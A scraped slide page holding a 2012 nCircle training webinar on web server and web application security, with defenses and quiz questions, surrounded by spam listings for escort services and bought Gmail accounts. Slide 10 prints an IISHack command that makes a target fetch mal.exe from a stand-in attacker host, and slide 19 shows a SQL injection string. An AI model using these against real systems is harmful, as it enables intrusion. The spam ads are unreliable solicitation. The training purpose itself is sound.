Call Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / Ncrdollysharma2066
 
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCRashishs7044
 
Investment in The Coconut Industry by Nancy Cheruiyot
Investment in The Coconut Industry by Nancy CheruiyotInvestment in The Coconut Industry by Nancy Cheruiyot
Investment in The Coconut Industry by Nancy Cheruiyotictsugar
 
8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR
8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR
8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCRashishs7044
 
MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?Olivia Kresic
 

Último (20)

International Business Environments and Operations 16th Global Edition test b...
International Business Environments and Operations 16th Global Edition test b...International Business Environments and Operations 16th Global Edition test b...
International Business Environments and Operations 16th Global Edition test b...
 
APRIL2024_UKRAINE_xml_0000000000000 .pdf
APRIL2024_UKRAINE_xml_0000000000000 .pdfAPRIL2024_UKRAINE_xml_0000000000000 .pdf
APRIL2024_UKRAINE_xml_0000000000000 .pdf
 
FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607
 
Kenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby AfricaKenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby Africa
 
Innovation Conference 5th March 2024.pdf
Innovation Conference 5th March 2024.pdfInnovation Conference 5th March 2024.pdf
Innovation Conference 5th March 2024.pdf
 
Annual General Meeting Presentation Slides
Annual General Meeting Presentation SlidesAnnual General Meeting Presentation Slides
Annual General Meeting Presentation Slides
 
Organizational Structure Running A Successful Business
Organizational Structure Running A Successful BusinessOrganizational Structure Running A Successful Business
Organizational Structure Running A Successful Business
 
Intro to BCG's Carbon Emissions Benchmark_vF.pdf
Intro to BCG's Carbon Emissions Benchmark_vF.pdfIntro to BCG's Carbon Emissions Benchmark_vF.pdf
Intro to BCG's Carbon Emissions Benchmark_vF.pdf
 
Kenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith PereraKenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith Perera
 
Independent Call Girls Andheri Nightlaila 9967584737
Independent Call Girls Andheri Nightlaila 9967584737Independent Call Girls Andheri Nightlaila 9967584737
Independent Call Girls Andheri Nightlaila 9967584737
 
Buy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail AccountsBuy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail Accounts
 
Call Us ➥9319373153▻Call Girls In North Goa
Call Us ➥9319373153▻Call Girls In North GoaCall Us ➥9319373153▻Call Girls In North Goa
Call Us ➥9319373153▻Call Girls In North Goa
 
Call US-88OO1O2216 Call Girls In Mahipalpur Female Escort Service
Call US-88OO1O2216 Call Girls In Mahipalpur Female Escort ServiceCall US-88OO1O2216 Call Girls In Mahipalpur Female Escort Service
Call US-88OO1O2216 Call Girls In Mahipalpur Female Escort Service
 
8447779800, Low rate Call girls in Saket Delhi NCR
8447779800, Low rate Call girls in Saket Delhi NCR8447779800, Low rate Call girls in Saket Delhi NCR
8447779800, Low rate Call girls in Saket Delhi NCR
 
Call Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / Ncr
Call Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / NcrCall Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / Ncr
Call Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / Ncr
 
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
 
Investment in The Coconut Industry by Nancy Cheruiyot
Investment in The Coconut Industry by Nancy CheruiyotInvestment in The Coconut Industry by Nancy Cheruiyot
Investment in The Coconut Industry by Nancy Cheruiyot
 
8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR
8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR
8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR
 
MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?
 
Japan IT Week 2024 Brochure by 47Billion (English)
Japan IT Week 2024 Brochure by 47Billion (English)Japan IT Week 2024 Brochure by 47Billion (English)
Japan IT Week 2024 Brochure by 47Billion (English)
 

nCircle Webinar: Get your Black Belt

  • 1. Get Your Black Belt in Web Application Security 26 April 2012 © 2012 nCircle. All rights reserved.
  • 2. Web Server and Web Applications Security 2 © 2012 nCircle. All rights reserved.
  • 3. Why Web Servers and Web Applications are hard to Defend Why is attacking a web server or web applications one of the easiest attack methods? – On the perimeter – Accessible by anyone on the Internet – Need to balance functionality with security – Port 80 and port 443 (can‟t just block them) – Lack of security awareness of many web developers – High level of traffic. Hard to distinguish an attack from high volumes of legitimate traffic 3 © 2012 nCircle. All rights reserved.
  • 4. Typical Attack Steps against a Web Server 1. Reconnaissance (passive) 2. Scanning and enumeration (active) 3. Gaining Access (exploit) 4. Escalation of privilege 5. Maintain access 6. Covering tracks and placing backdoors 4 © 2012 nCircle. All rights reserved.
  • 5. Two Methods of Attack: The Web Server and Web Applications • Web Server Attacks – Vulnerabilities in the web server or web server configuration • Examples: Buffer Overflows, Traversals • Web Application Attacks – Vulnerabilities in web applications • Command Injection • XSS (Cross Site Scripting) 5 © 2012 nCircle. All rights reserved.
  • 6. Ichi (one) With respect to defending against web attacks what is problem with port 80 with respect to security? a. It is the default TFTP port b. It can be closed c. It is not a well-known port d. It can‟t be blocked Difficulty: Easy/Medium 6 © 2012 nCircle. All rights reserved.
  • 7. Ni (two) For an attack to work on a web server or a web application what does it need to have? a. An exploit b. A risk c. A vulnerability d. A configuration Difficulty: Easy/Medium 7 © 2012 nCircle. All rights reserved.
  • 8. Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu. 8 © 2012 nCircle. All rights reserved.
  • 9. Web Server Attacks 9 © 2012 nCircle. All rights reserved.
  • 10. Buffer Overflow Attack A buffer overflow attack allows an attacker to overwrite code in the program‟s execution path and thus take control of the program to execute the attacker‟s code. Cause: Poor boundary checking (checking whether a variable is within some bounds before its use) Example: IISHack.exe  Exploits the IIS http daemon buffer. Below is a sample: c: iishack www.WebserverA.com 80 www.hackserver.com/mal.exe 10 © 2012 nCircle. All rights reserved.
  • 11. Web Server File System Traversal Attacks • Clients are permitted access to only a specific partition of the server file system, known as the web document root directory. • By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server. • Attack is initiated by inserting special characters in URLs, for example, ../ sequence. • Encoding can be used to bypass Web server filtering. 11 © 2012 nCircle. All rights reserved.
  • 12. San (three) Which one of the following is NOT one of the typical attacks used against a web server like Apache? a. ARP poisoning b. Buffer overflow c. Source disclosure d. File system traversal Difficulty: Easy/Medium 12 © 2012 nCircle. All rights reserved.
  • 13. Shi (four) A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack? a. Buffer boundary b. File system traversal c. Encryption d. File overflow Difficulty: Easy/Medium 13 © 2012 nCircle. All rights reserved.
  • 14. Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu. 14 © 2012 nCircle. All rights reserved.
  • 15. Web Application Attacks 15 © 2012 nCircle. All rights reserved.
  • 16. OWASP Top 10 (2010 List) – www.owasp.org OWASP Top 10 Categories A1-Injection A2-Cross Site Scripting (XSS) A3-Broken Authentication/Session Management A4-Insecure Direct Object References A5-Cross Site Request Forgery (CSRF) A6-Security Misconfiguration A7-Insecure Cryptographic Storage A8-Failure to Restrict URL Access A9-Insufficient Transport Layer Encryption A10-Unvalidated Redirects and Forwards 16 © 2012 nCircle. All rights reserved.
  • 17. Injection (Command Injection – OWASP A1) • Occurs when untrusted data is sent to a command interpreter as part of a command or query. • Cleverly formed data can trick the command interpreter to performing unintended commands or revealing unintended information • Examples of command injection: – SQL Injection – Script Injection – Any web application that accepts input is potentially vulnerable to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program 17 © 2012 nCircle. All rights reserved.
  • 18. SQL Injection (Valid Data) As an example the user enters Jill and Brown into two input fields on a web page The program takes this input into the CustID variable and dynamically creates the query string : „SELECT * FROM accounts WHERE customerID = Jill_Brown‟ The program then sends this SQL query to the SQL database and the SQL database then retrieves and displays Jill Brown‟s record as expected. 18 © 2012 nCircle. All rights reserved.
  • 19. SQL Injection (Invalid Data) The user enters Jane and Doe‟ OR „1‟=„1 on the web page The program takes this input and dynamically creates the query string : „SELECT * FROM accounts WHERE customerID = Jane_Doe‟ OR „1‟=„1‟ The program send this SQL query to the SQL database and it then retrieves ALL of the records in the database accounts table – NOT as expected  19 © 2012 nCircle. All rights reserved.
  • 20. Defenses Against SQL Injection • Prepared Statements (parameterized queries) • Stored Procedures • Escaping all user supplied input • Least privilege • White list input validation Reference: OWASP SQL Injection Prevention Cheat Sheet (www.owasp.org) 20 © 2012 nCircle. All rights reserved.
  • 21. Cross Site Scripting (XSS – OWASP A2) • Cross-Site Scripting attacks are a type of injection attack, in which malicious scripts are injected into the otherwise benign and trusted web sites. Injection occurs usually by inserting untrusted data in a user‟s browser via a web page request. Untrusted data 21 © 2012 nCircle. All rights reserved.
  • 22. Defenses Against XSS Primary defense: Escaping untrusted data “Escaping” is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser. Rule #0 : Never put untrusted data (in a web page) Except in Allowed Locations Rule #1 : HTML Escape Before Inserting Untrusted Data Except into HTML Element Content Rules #2 - #7 : These rules deal with exceptions if you put untrusted data in “Unallowed” locations Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org) 22 © 2012 nCircle. All rights reserved.
  • 23. Broken Authentication and Session Management (OWASP A3) • Web Application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented allowing an attacker to assume someone else's identity. 23 © 2012 nCircle. All rights reserved.
  • 24. Defenses Against Broken Authentication and Session Management • Secure management of session identifiers – Do not put session identifiers in the URL – Session IDs should have a timeout feature • Do not allow the login process to execute from an unencrypted page • Password Change Controls • Password use / strength / storage • Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org) 24 © 2012 nCircle. All rights reserved.
  • 25. Go (five) An web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following? a. Sequence infiltration b. SQL injection c. Cookie poisoning d. Hidden parameter exploit Difficulty: Easy/Medium 25 © 2012 nCircle. All rights reserved.
  • 26. Roku (six) What is one of the defenses against SQL Injection? a. Least Privilege b. Black list input validation c. Sanitization d. Proxy manipulation Difficulty: Easy/Medium 26 © 2012 nCircle. All rights reserved.
  • 27. Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu. 27 © 2012 nCircle. All rights reserved.
  • 28. Web Server and Web Application Defense Tools 28 © 2012 nCircle. All rights reserved.
  • 29. Web Server and Application Defense Tools (1 of 2) • Scanning and mapping tools • Ping, Nping, Nmap, Amap, SuperScan, … • Vulnerability and Web vulnerability scanners • Nikto, Wikto, Nessus, w3af, IP360, WebInspect, Sentinel, WebApp360, Cenzic, Fortify, … • Web proxy tools • WebScarab, Paros Proxy, Burp Proxy, … • Web mapping/ripping tools • Black Widow, Wget, skipfish, … • Communication/data transfer tools • Ncat, telnet, ftp, …. • Exploits, Exploit Kits, and Exploit Frameworks • Program for a specific exploit • Pen Test frameworks: Metasploit, Core Impact, CANVAS 29 © 2012 nCircle. All rights reserved.
  • 30. Web Server and Application Defense Tools (2 of 2) • Password cracking tools • John the Ripper, Cain and Abel, PRTK, ophcrack, … • Web Source Code examination tools: • Instant Source, Firebug, …. • SQL Injection Tools • BSQL Hacker, The Mole, sqlmap, Pangolin, … 30 © 2012 nCircle. All rights reserved.
  • 31. Network Defense Tools (Protecting the Web Server) • Routers • Firewalls (network layer) • Web Application Firewalls (application layer) • Web Application Proxies • Honeypots/Honeynets • Logging • Intrusion Detection/Prevention System (IDS/IPS) • Host-based Intrusion Detection (HIDS), e.g. file integrity detection • Backups • Computer Forensic Tools 31 © 2012 nCircle. All rights reserved.
  • 32. Web Server Protection • Protect the Web Server • Vulnerability Assessment • Harden the Web Server – Host (OS) – Web Server – Web Services • Logging • Backups and recovery 32 © 2012 nCircle. All rights reserved.
  • 33. Place the Web Sever in an Untrusted Zone 33 © 2012 nCircle. All rights reserved.
  • 34. Security Harden the Web Server (1 of 2) • Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC) • Host (OS) hardening • Web Server hardening – Use tools like IIS Lockdown and URLscan – Harden each service you offer on your Web Server – Disable / remove anything you don‟t use or need: accounts, ports, services, accounts, plug-ins – Configuration settings – Permissions 34 © 2012 nCircle. All rights reserved.
  • 35. Security Harden the Web Server (2 of 2) • Authentication and Access Control – File and directory permissions – Account password and lockout policies • Logging and Audit Policies • Vulnerability and Compliance Assessments – Vulnerability scanner – Web application vulnerability scanner – Configuration scanner – Audits for compliance assessments – Penetration testing / manual testing 35 © 2012 nCircle. All rights reserved.
  • 36. Web Server Attack Countermeasures • Buffer Overflow – Can be mitigated by conducting frequent scans for server vulnerabilities – Prompting acquiring and installing patches and service packs – Implementing effective firewalls – Applying web configuration lockdown utilities • File System Traversal – Promptly apply patches and updates to the web server – Restrict privileges to executable programs such as cmd.exe – Set file and directory permissions – Locate the system software on a different disk drive from the web site software and content directory. 36 © 2012 nCircle. All rights reserved.
  • 37. Shichi (seven) Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps? a. Banner grabbing b. Defeating authentication c. Scanning d. Password Cracking Difficulty: Medium/Hard 37 © 2012 nCircle. All rights reserved.
  • 38. Hachi (eight) What is a good tool to help harden an IIS web server? (choose the best answer) a. Cain and Abel b. URLscan c. ncat d. WebScarab Difficulty: Medium/Hard 38 © 2012 nCircle. All rights reserved.
  • 39. Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan 39 © 2012 nCircle. All rights reserved.
  • 40. Resources • OWASP (Open Web Application Security Project) www.owasp.org • NIST (National Institute of Standards and Technology) www.nist.gov • SANS www.sans.org • Web Application Security Consortium (WASC) www.webappsec.org • SecTools.org http://sectools.org 40 © 2012 nCircle. All rights reserved.
  • 41. Questions? 41 © 2012 nCircle. All rights reserved.